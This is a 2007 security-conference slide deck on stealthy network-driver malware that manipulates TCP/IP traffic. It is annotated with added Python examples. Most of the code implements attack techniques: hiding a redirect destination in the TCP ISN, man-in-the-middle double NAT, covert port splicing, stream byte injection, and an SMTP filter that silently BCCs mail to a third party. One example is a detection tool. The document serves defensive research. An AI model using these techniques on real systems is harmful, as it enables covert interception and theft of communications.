TCP/IP Perversion

Rares Stefan, Third Brigade Inc.

SecTor 2007

Introduction
  • Perspective from a researcher focused on protecting hosts from malware
  • Implementing kernel-based protection mechanisms
    • Insight into a potential class of network driver malware
The Rise of Silent Malware
  • Three main areas of interest in malware R&D:
    • Delivery and activation
    • Hiding presence - rootkit techniques
    • Evasion - Minimize operating noise
      • Show no signs of activity on the infected system
      • Show no traces of network activity on the wire
Operational Challenges
  • Operate on wire data
    • Active at a layer that guarantees transparency to the host
    • Correctly perform inline IP reassembly and TCP stream reassembly
    • Allow for arbitrary injection/removal of data in TCP sessions
Operational Challenges…part deux
  • Maintain silence on the host:
    • Never initiate TCP sessions
    • Never receive TCP open-session requests
    • Do not rely on TCP port splicing if the infected host is a server
    • Do not rely on static motherships if the infected host is a workstation
    • Packet modifications should not be easily visible in local network traces
Operational Challenges…part trois
  • Maintain silence on the wire
    • Only make use of legitimate TCP sessions
    • Do not alter protocol semantics - resistance to network anomaly detection engines
    • Piggyback on encrypted channels (SSL) and multiple TCP sessions for large data transfers
Driver Implementation Pre-Vista
  • Possible interception points in the Windows network stack (slide diagram, top to bottom):
    • User Land
    • TDI
    • FW hook / PF hook
    • TCP/IP
    • NDIS: NDIS.SYS, intermediate driver, miniport driver
  • Diagram callouts (their layer association was not preserved): "Never"; "Access to data stream, not packets"; "Some interesting areas"; "No guaranteed access to outbound payload"
  • NDIS hooking:
    • Some delivery challenges
    • Most flexibility
    • Driver signing issues
    • Complete control over everything between the hardware drivers and the transport protocol
Rogue Network Driver Framework
  • Firewall hook kernel module for basic packet header operations
  • IM Filter driver:
    • Inline IP reassembly
    • Inline TCP stream reassembly
    • TCP session normalization
Infected Workstation
  • Hosts in the diagram: Alice (infected workstation), Bob (the man-in-the-middle, MIM) and the target server; addresses shown: 10.0.1.26 and 10.0.1.124
  • Alice opens https://server
  • Alice's driver: DNAT – DstIP_server -> DstIP_Bob (the outgoing SYN is sent to Bob instead of the server)
  • Bob's driver: SNAT/DNAT – SrcIP_Alice -> SrcIP_Bob, DstIP_Bob -> DstIP_server
  • Translated request reaches server
Infected Server
  • Selective DN(P)AT (destination NAT with port translation) applied only to Alice's packets: SrcIP_Alice / SrcIP_server, Dst_Port_443 -> DstPort_135
  • Diagram labels: ALICE, "telnet server:80"; Server; "https://server", "https request served" (other clients' HTTPS is served normally)
Packet Header Opportunities
  • Passive covert channels
    • http://www.invisiblethings.org/papers/passive-covert-channels-linux.pdf
    • http://www.ouah.org/neural_networks_vs_NUSHU.pdf
    • http://staff.science.uva.nl/~delaat/snb-2005-2006/p27/report.pdf
  • Port splicing
  • Most significant; communicating the original intent:
    • DNAT on outgoing SYN – change destination address to that of the MIM
    • Insert original dstIP in header fields
    • MIM double NAT
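The redirection scheme of the Infected Workstation, Infected Server and Packet Header Opportunities slides, as an added example that is not code from the presentation. It runs on constructed IPv4+TCP SYN segments with real checksum arithmetic: Alice's driver sends the SYN to the MIM and stashes the real destination in a header field, the MIM decodes it and double-NATs, and an infected server splices one client's port 443 onto port 135. Assumptions: the stashed field is the ISN (the slides only say "header fields"; the ISN is what the cited NUSHU-style passive channels use); 10.0.1.26 is Alice and 10.0.1.124 is Bob; the server address 203.0.113.10 and all port numbers are made up.

```python
"""Added example, not from the slides: the header games of the Infected
Workstation / Infected Server / Packet Header Opportunities slides on constructed
IPv4+TCP segments with real checksum arithmetic. Assumed: the real destination
rides in the SYN's ISN (the slides say only "header fields"); 10.0.1.26 is Alice,
10.0.1.124 is Bob (the MIM); server address and ports are made up."""
import socket
import struct

IP_HDR = struct.Struct("!BBHHHBBH4s4s")  # 20-byte IPv4 header, no options
TCP_HDR = struct.Struct("!HHIIBBHHH")     # 20-byte TCP header, no options
ALICE, BOB, SERVER = "10.0.1.26", "10.0.1.124", "203.0.113.10"
SYN, ACK = 0x02, 0x10

def csum(data):
    """RFC 1071 ones-complement checksum (checksum field must already be zero)."""
    data = bytes(data) + (b"\0" if len(data) % 2 else b"")
    s = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return ~s & 0xFFFF

def fix_checksums(ip, tcp):
    """Recompute the IP header and TCP pseudo-header checksums after a rewrite."""
    ip[10:12] = b"\0\0"
    ip[10:12] = struct.pack("!H", csum(ip))
    tcp[16:18] = b"\0\0"
    pseudo = struct.pack("!4s4sBBH", bytes(ip[12:16]), bytes(ip[16:20]), 0, 6, len(tcp))
    tcp[16:18] = struct.pack("!H", csum(pseudo + bytes(tcp)))
    return bytes(ip + tcp)

def segment(src, dst, sport, dport, seq, flags, ack=0):
    """A segment as the host's own stack would emit it (constructed, no payload)."""
    ip = bytearray(IP_HDR.pack(0x45, 0, 40, 0x1234, 0x4000, 64, 6, 0,
                               socket.inet_aton(src), socket.inet_aton(dst)))
    tcp = bytearray(TCP_HDR.pack(sport, dport, seq, ack, 5 << 4, flags, 65535, 0, 0))
    return fix_checksums(ip, tcp)

def rewrite(pkt, src=None, dst=None, sport=None, dport=None, seq=None):
    """Return pkt with the given fields replaced and both checksums repaired."""
    ip, tcp = bytearray(pkt[:20]), bytearray(pkt[20:])
    if src: ip[12:16] = socket.inet_aton(src)
    if dst: ip[16:20] = socket.inet_aton(dst)
    if sport is not None: tcp[0:2] = struct.pack("!H", sport)
    if dport is not None: tcp[2:4] = struct.pack("!H", dport)
    if seq is not None: tcp[4:8] = struct.pack("!I", seq & 0xFFFFFFFF)
    return fix_checksums(ip, tcp)

def fields(pkt):
    ip, tcp = IP_HDR.unpack(pkt[:20]), TCP_HDR.unpack(pkt[20:40])
    return dict(src=socket.inet_ntoa(ip[8]), dst=socket.inet_ntoa(ip[9]),
                sport=tcp[0], dport=tcp[1], seq=tcp[2], flags=tcp[5])

def checksums_ok(pkt):
    """Both checksums verify: the rewritten packet will not be dropped on the way."""
    ip, tcp = pkt[:20], pkt[20:]
    pseudo = struct.pack("!4s4sBBH", ip[12:16], ip[16:20], 0, 6, len(tcp))
    return csum(ip) == 0 and csum(pseudo + tcp) == 0

def alice_outbound(pkt, mim=BOB):
    """Infected workstation: DNAT the outgoing SYN to the MIM and carry the real
    destination in the ISN. Returns (wire packet, ISN delta): the driver must add the
    delta to every later outbound seq and subtract it from every inbound ack."""
    f = fields(pkt)
    if f["flags"] & SYN and not f["flags"] & ACK:
        hidden = struct.unpack("!I", socket.inet_aton(f["dst"]))[0]
        return rewrite(pkt, dst=mim, seq=hidden), (hidden - f["seq"]) & 0xFFFFFFFF
    return pkt, 0

def mim_inbound(pkt, self_ip=BOB):
    """MIM (Bob): decode the real server from the ISN, then double NAT:
    SNAT source to self, DNAT destination to the server. Returns (packet, NAT entry)."""
    f = fields(pkt)
    if f["dst"] != self_ip or not f["flags"] & SYN or f["flags"] & ACK:
        return None, None
    real_dst = socket.inet_ntoa(struct.pack("!I", f["seq"]))
    return rewrite(pkt, src=self_ip, dst=real_dst), {(f["src"], f["sport"], f["dport"]): real_dst}

def mim_return(pkt, nat, self_ip=BOB):
    """MIM: undo the double NAT on the server's reply so Alice sees it coming from Bob."""
    f = fields(pkt)
    for (client, cport, sport), server in nat.items():
        if (f["src"], f["sport"], f["dport"]) == (server, sport, cport):
            return rewrite(pkt, src=self_ip, dst=client)
    return None

def server_splice(pkt, trusted_src, public_port=443, hidden_port=135):
    """Infected server: selective DN(P)AT. Only trusted_src talking to the public port is
    diverted to the hidden service; the reply path hides the real port again."""
    f = fields(pkt)
    if f["src"] == trusted_src and f["dport"] == public_port:
        return rewrite(pkt, dport=hidden_port)
    if f["dst"] == trusted_src and f["sport"] == hidden_port:
        return rewrite(pkt, sport=public_port)
    return pkt
```

Overwriting the ISN with an address value is what makes the "ISN analysis" item on the detection slide workable: every redirected SYN to the same MIM carries the same, decidedly non-random, 32-bit value. The delta returned by alice_outbound is the seam between the pre- and post-modification edges of the Inline TCP Reassembly slide: Alice's driver has to add it to every later outbound sequence number and subtract it from every inbound acknowledgement, or the host's stack will treat the peer's acknowledgements as out of window.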
Why Payload Injection ?
  • Access to packet data
  • High bandwidth channel
  • Bypass application proxies
  • Altering TCP data length on the wire is not trivial!
Inline Injection
  • Support for IP reassembly on incoming traffic and IP fragmentation on outbound traffic
  • Support for TCP stream reassembly – datagram reordering, injection of acknowledgements and resets, among other things
Inline TCP Reassembly
  • Maintain two edges (pre and post modification):
    • ISN
    • MaxSeq
    • MaxAck
    • Window
    • Maximum SeqNo of Filtered Data
    • Maximum AckNo of Filtered Data
    • Queue/counter for non Ack-ed datagrams
    • Queue/counter for not sent datagrams
    • Needed Window Scale
    • Actual Window Scale
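The bookkeeping behind "Altering TCP data length on the wire is not trivial!" and the pre/post-modification edges listed above, as an added example that is not code from the presentation. One direction of a session (host to peer) passes through an inline filter that splices extra bytes into the stream; the host keeps its own (pre-modification) sequence space and the peer only ever sees the wire (post-modification) space, so every outbound sequence number and every inbound acknowledgement has to be translated, and an acknowledgement that lands inside injected bytes must be clamped. Sequence numbers are relative and 32-bit wrap-around is ignored; removal of bytes is the mirror image (a negative delta) and is left out. The sample stream is constructed.

```python
"""Added example, not from the slides: sequence-number translation for one direction
of a TCP session into which an inline filter injects bytes. Relative sequence
numbers; wrap-around ignored for readability."""


class StreamInjector:
    def __init__(self):
        self.injections = []  # (host_seq, payload): payload goes on the wire just before host byte host_seq

    def schedule(self, host_seq, payload):
        """Queue payload for insertion in front of the host byte with sequence number host_seq."""
        self.injections.append((host_seq, bytes(payload)))
        self.injections.sort()

    def delta_before(self, host_seq):
        """How many injected bytes precede host byte host_seq on the wire (pre -> post offset)."""
        return sum(len(p) for s, p in self.injections if s < host_seq)

    def outbound(self, seq, payload):
        """Translate the host segment [seq, seq+len) into the wire segment: shift the sequence
        number by the bytes injected earlier and splice in any injection that falls inside.
        A retransmission of the same host range maps to the same wire bytes, so the peer
        never sees inconsistent data."""
        out, pos = bytearray(), 0
        for s, p in self.injections:
            if seq <= s < seq + len(payload):
                out += payload[pos:s - seq] + p
                pos = s - seq
        out += payload[pos:]
        return seq + self.delta_before(seq), bytes(out)

    def inbound_ack(self, ack):
        """Translate the peer's ACK (wire space) into the host's space (post -> pre). An ACK
        that lands inside injected bytes is clamped to the host byte they were inserted
        before: the host has not sent anything past it and must not see it acknowledged."""
        host = ack
        for s, p in self.injections:
            wire_start = s + self.delta_before(s)
            if ack >= wire_start + len(p):
                host -= len(p)          # whole injection acknowledged, drop it from the count
            elif ack > wire_start:
                return s                # partially acknowledged injection: clamp
            else:
                break                   # this and later injections lie beyond the ack
        return host


def demo():
    """Host writes 'hello ', 'world', '!'; the filter inserts 'brave new ' before 'world'.
    Returns the wire segments and the host-space view of four peer acknowledgements."""
    inj = StreamInjector()
    inj.schedule(1006, b"brave new ")
    wire = [inj.outbound(1000, b"hello "), inj.outbound(1006, b"world"), inj.outbound(1011, b"!")]
    acks = {a: inj.inbound_ack(a) for a in (1006, 1010, 1016, 1022)}
    return wire, acks
```

In demo(), the peer's acknowledgement of 1010 sits inside the injected text, so the host is told 1006; 1016 means all injected bytes are acknowledged, which is again host byte 1006; only 1022 moves the host forward, to 1012. Window and window-scale tracking from the slide are the same idea applied to the advertised receive window: the host's window has to shrink by the bytes the filter still owes the peer.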
SMTP Injection – Eliminating Bob from the Equation
  • Reduces the complexity of MIM and random redirection
  • Works with application level proxies
  • Replace the RCPT TO argument or inject an additional RCPT TO (a silent BCC)
  • Increases the probability of detection – SMTP server logs
SMTP Injection
  • Diagram: Alice sends Bob a message through the SMTP server
  • Driver injects BCC to Eva
  • Bob receives original message
  • So does Eva
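The SMTP injection of the two slides above as a line-oriented inline filter; this is an added example, not code from the presentation. The client's RCPT TO is forwarded together with an injected RCPT TO for Eva, and the server's reply to the injected command is swallowed so the client sees exactly the dialog it expects; multi-line replies and the DATA phase (where lines are not commands) are handled. The dialog lines are constructed and eva@example.com is the assumed BCC target.

```python
"""Added example, not from the slides: an inline SMTP filter that adds a hidden
recipient (the 'Eliminating Bob' slide). Dialog constructed; eva@example.com assumed."""
from collections import deque


class SmtpBccInjector:
    def __init__(self, bcc):
        self.bcc = bcc
        self.reply_plan = deque()  # one entry per command sent to the server: "fwd", "drop" or "data"
        self.in_data = False       # inside the message body: lines are not commands and get no reply
        self.injected = False      # one BCC per message

    def client_to_server(self, line):
        """One CRLF-terminated line from the client; returns what goes on to the server."""
        if self.in_data:
            if line == b".\r\n":
                self.in_data = False
                self.reply_plan.append("fwd")  # the server answers the end of data
            return line
        cmd = line.upper()
        if cmd.startswith(b"DATA"):
            self.reply_plan.append("data")     # 354 will switch us into body mode
        elif cmd.startswith(b"RCPT TO:") and not self.injected:
            self.injected = True
            self.reply_plan.append("fwd")      # reply to the client's own RCPT
            self.reply_plan.append("drop")     # reply to ours: the client must never see it
            return line + b"RCPT TO:<" + self.bcc + b">\r\n"
        else:
            if cmd.startswith((b"MAIL FROM:", b"RSET")):
                self.injected = False          # next message gets its BCC too
            self.reply_plan.append("fwd")
        return line

    def server_to_client(self, line):
        """One reply line from the server; returns what the client may see (b'' if swallowed).
        Multi-line replies ('250-...') belong to one command; the plan entry is consumed on
        the last line, whose fourth character is a space."""
        entry = self.reply_plan[0] if self.reply_plan else "fwd"  # greeting: no command yet
        if len(line) >= 4 and line[3:4] == b" " and self.reply_plan:
            self.reply_plan.popleft()
            if entry == "data":
                self.in_data = line.startswith(b"354")
        return b"" if entry == "drop" else line


def demo(bcc=b"eva@example.com"):
    """Run a constructed Alice -> Bob submission through the filter.
    Returns (bytes the server received, bytes the client saw)."""
    dialog = [
        ("S", b"220 mail.example.com ESMTP\r\n"),
        ("C", b"EHLO alice\r\n"),
        ("S", b"250-mail.example.com\r\n"), ("S", b"250 PIPELINING\r\n"),
        ("C", b"MAIL FROM:<alice@example.com>\r\n"), ("S", b"250 OK\r\n"),
        ("C", b"RCPT TO:<bob@example.com>\r\n"),
        ("S", b"250 OK\r\n"),   # reply to Bob's RCPT, forwarded
        ("S", b"250 OK\r\n"),   # reply to the injected RCPT for Eva, swallowed
        ("C", b"DATA\r\n"), ("S", b"354 End data with <CR><LF>.<CR><LF>\r\n"),
        ("C", b"Subject: hi\r\n"), ("C", b"RCPT TO:<not-a-command>\r\n"), ("C", b".\r\n"),
        ("S", b"250 Queued\r\n"),
    ]
    f = SmtpBccInjector(bcc)
    to_server, to_client = b"", b""
    for side, line in dialog:
        if side == "C":
            to_server += f.client_to_server(line)
        else:
            to_client += f.server_to_client(line)
    return to_server, to_client
```

The swallowed reply is why the slide warns about SMTP server logs: the server has accepted, and logged, a recipient the client never named, and the client's own mail log shows nothing. The filter also assumes the server tolerates two commands arriving back to back; a server that does not advertise PIPELINING may answer the injected command with an error, which is swallowed just the same, so the BCC silently fails rather than breaking the session.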
HTTP Injection
  • TCP header tricks are useless once an HTTP proxy sits in the path – need to find a workaround
  • Easy workaround, but we need to be careful:
    • Transparent proxies (the initial HTTP request looks normal, so we always assume we may be transparently "proxied")
    • Direct proxies – easy to spot in HTTP(S) requests
  • URI & headers will help us redirect/leak data
    • Make use of the Authorization and Cookie headers – they won't be scrubbed
    • POST data also presents injection opportunities
HTTP Injection
  • Diagram: Alice requests http://www.google.com
  • Driver: change request; inject data
  • The request traverses the Web Proxy – Content Filtering
  • Endpoints shown: google.com and Bob
SSL Injection Demo
  • Diagram: Alice opens https://somebank.com
  • Driver: inject data
  • The session traverses Perimeter Security
  • Endpoints shown: somebank.com and Bob
Detecting Network Driver Malware
  • Conventional detection mechanisms
    • AV/AS (anti-virus, anti-spyware) signatures; configuration management
  • New detection mechanisms
    • Traffic based detection?
      • Malicious destinations, ISN analysis
      • Network trace diff – local vs. remote
      • NDIS based sniffer for better visibility?
  • Other
    • Host based application control ineffective
    • DLP?
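The "network trace diff – local vs. remote" item above, as an added example that is not code from the presentation. The host's own view of its outbound sessions (a sniffer on the host, or what the stack believes it sent) is compared with a capture from a tap or SPAN port on the same segment, taken before any legitimate NAT device or proxy. Flows are matched on the host's own source address and port, the one part of the four-tuple a rewriting driver has no reason to touch for an outbound session, and any disagreement in destination, ISN or byte count is reported. The packet summaries are a constructed one-line-per-packet format rather than pcap; the addresses reuse the slides' 10.0.1.26 (Alice) and 10.0.1.124 (Bob), the rest are made up.

```python
"""Added example, not from the slides: diff a host-side capture against a wire-side
capture of the same connections to spot an inline rewriting driver. Captures are
constructed summaries: 'src:sport > dst:dport flags seq len'."""
import re
from collections import defaultdict

LINE = re.compile(r"(\S+):(\d+) > (\S+):(\d+) (\S+) (0x[0-9a-fA-F]+) (\d+)$")

# Constructed captures of the same two connections from 10.0.1.26 (the slides' Alice).
LOCAL_TRACE = """
10.0.1.26:40000 > 203.0.113.10:443 S 0x11223344 0
10.0.1.26:40000 > 203.0.113.10:443 . 0x11223345 0
10.0.1.26:40000 > 203.0.113.10:443 P 0x11223345 100
10.0.1.26:40001 > 198.51.100.7:80 S 0xa1b2c3d4 0
10.0.1.26:40001 > 198.51.100.7:80 P 0xa1b2c3d5 60
"""
REMOTE_TRACE = """
10.0.1.26:40000 > 10.0.1.124:443 S 0xcb00710a 0
10.0.1.26:40000 > 10.0.1.124:443 . 0xcb00710b 0
10.0.1.26:40000 > 10.0.1.124:443 P 0xcb00710b 100
10.0.1.26:40001 > 198.51.100.7:80 S 0xa1b2c3d4 0
10.0.1.26:40001 > 198.51.100.7:80 P 0xa1b2c3d5 76
"""


def parse_trace(text):
    """One summary line per packet -> list of dicts."""
    pkts = []
    for raw in text.strip().splitlines():
        m = LINE.match(raw.strip())
        if not m:
            raise ValueError("unparseable summary line: %r" % raw)
        src, sport, dst, dport, flags, seq, size = m.groups()
        pkts.append(dict(src=src, sport=int(sport), dst=dst, dport=int(dport),
                         flags=flags, seq=int(seq, 16), len=int(size)))
    return pkts


def by_flow(pkts):
    """Group by the host's own source address and port: the only part of the 4-tuple
    a rewriting driver on that host has no reason to change for an outbound session."""
    flows = defaultdict(list)
    for p in pkts:
        flows[(p["src"], p["sport"])].append(p)
    return flows


def diff_traces(local_text, remote_text):
    """Return (flow, finding) pairs for every place the wire disagrees with the host."""
    local, remote = by_flow(parse_trace(local_text)), by_flow(parse_trace(remote_text))
    findings = []
    for key, lpk in sorted(local.items()):
        rpk = remote.get(key)
        if rpk is None:
            findings.append((key, "flow never appeared on the wire"))
            continue
        lsyn = next((p for p in lpk if "S" in p["flags"]), None)
        rsyn = next((p for p in rpk if "S" in p["flags"]), None)
        if lsyn and rsyn:
            if (lsyn["dst"], lsyn["dport"]) != (rsyn["dst"], rsyn["dport"]):
                findings.append((key, "destination rewritten %s:%d -> %s:%d"
                                 % (lsyn["dst"], lsyn["dport"], rsyn["dst"], rsyn["dport"])))
            if lsyn["seq"] != rsyn["seq"]:
                findings.append((key, "ISN rewritten 0x%08x -> 0x%08x" % (lsyn["seq"], rsyn["seq"])))
        lbytes, rbytes = sum(p["len"] for p in lpk), sum(p["len"] for p in rpk)
        if lbytes != rbytes:
            findings.append((key, "payload differs: host sent %d bytes, wire carried %d (%+d)"
                             % (lbytes, rbytes, rbytes - lbytes)))
    for key in sorted(remote.keys() - local.keys()):
        findings.append((key, "flow on the wire the host never saw"))
    return findings


if __name__ == "__main__":
    for flow, what in diff_traces(LOCAL_TRACE, REMOTE_TRACE):
        print("%s:%d  %s" % (flow[0], flow[1], what))
```

The comparison only works if the remote capture is taken where no legitimate device has rewritten anything yet, and the local capture is taken by something the rogue driver cannot see through; the slide's question about an NDIS-based sniffer is exactly this problem, since a sniffer above the malicious intermediate driver records what the host believes it sent, which is what this diff needs, while a sniffer below it would agree with the wire.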
Conclusions
  • Passive kernel malware is difficult to spot
  • There are significant implementation challenges for coders
  • Prevention remains the key approach